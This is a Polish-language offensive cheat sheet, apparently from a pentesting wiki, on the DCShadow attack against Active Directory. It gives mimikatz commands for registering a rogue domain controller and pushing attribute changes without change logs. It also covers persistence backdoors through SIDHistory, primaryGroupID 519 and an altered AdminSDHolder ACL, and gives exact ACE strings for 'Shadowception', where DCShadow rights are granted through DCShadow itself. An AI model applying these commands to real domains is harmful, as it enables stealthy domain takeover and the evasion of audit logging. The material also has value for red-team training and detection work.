DCShadow

DCShadow

Rejestruje nowy kontroler domeny w AD i używa go do wypychania atrybutów (SIDHistory, SPNs...) na określonych obiektach bez pozostawiania jakichkolwiek logów dotyczących zmian. Musisz mieć uprawnienia DA i być w domenie głównej. Zauważ, że jeśli użyjesz błędnych danych, pojawią się dość brzydkie logi.

Aby przeprowadzić atak, potrzebujesz 2 instancji mimikatz. Jedna z nich uruchomi serwery RPC z uprawnieniami SYSTEM (musisz tutaj wskazać zmiany, które chcesz wprowadzić), a druga instancja będzie używana do wypychania wartości:

!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"

lsadump::dcshadow /push

Zauważ, że elevate::token nie zadziała w sesji mimikatz1, ponieważ podnosi uprawnienia wątku, ale musimy podnieść uprawnienia procesu. Możesz również wybrać obiekt "LDAP": /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local

Możesz wprowadzić zmiany z konta DA lub z konta użytkownika z minimalnymi uprawnieniami:

• W obiekcie domeny:

• DS-Install-Replica (Dodaj/Usuń replikę w domenie)

• DS-Replication-Manage-Topology (Zarządzaj topologią replikacji)

• DS-Replication-Synchronize (Synchronizacja replikacji)

• Obiekt Sites (i jego dzieci) w kontenerze konfiguracji:

• CreateChild i DeleteChild

• Obiekt komputera, który jest zarejestrowany jako DC:

• WriteProperty (Nie Write)

• Obiekt docelowy:

• WriteProperty (Nie Write)

Możesz użyć Set-DCShadowPermissions, aby nadać te uprawnienia użytkownikowi bez uprawnień (zauważ, że pozostawi to pewne logi). To jest znacznie bardziej restrykcyjne niż posiadanie uprawnień DA. Na przykład: Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose Oznacza to, że nazwa użytkownika student1 po zalogowaniu na maszynie mcorp-student1 ma uprawnienia DCShadow do obiektu root1user.

Używanie DCShadow do tworzenia backdoorów

lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519

lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519

#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>

Shadowception - Przyznaj uprawnienia DCShadow za pomocą DCShadow (bez zmodyfikowanych dzienników uprawnień)

Musimy dodać następujące ACE z SID naszego użytkownika na końcu:

• Na obiekcie domeny:

• (OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

• (OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)

• (OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

• Na obiekcie komputera atakującego: (A;;WP;;;UserSID)

• Na obiekcie użytkownika docelowego: (A;;WP;;;UserSID)

• Na obiekcie Sites w kontenerze Configuration: (A;CI;CCDC;;;UserSID)

Aby uzyskać aktualny ACE obiektu: (New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl

Zauważ, że w tym przypadku musisz wprowadzić kilka zmian, a nie tylko jedną. Tak więc, w sesji mimikatz1 (serwer RPC) użyj parametru /stack z każdą zmianą, którą chcesz wprowadzić. W ten sposób będziesz musiał tylko /push raz, aby wykonać wszystkie zablokowane zmiany na serwerze rouge.

Więcej informacji o DCShadow na ired.team.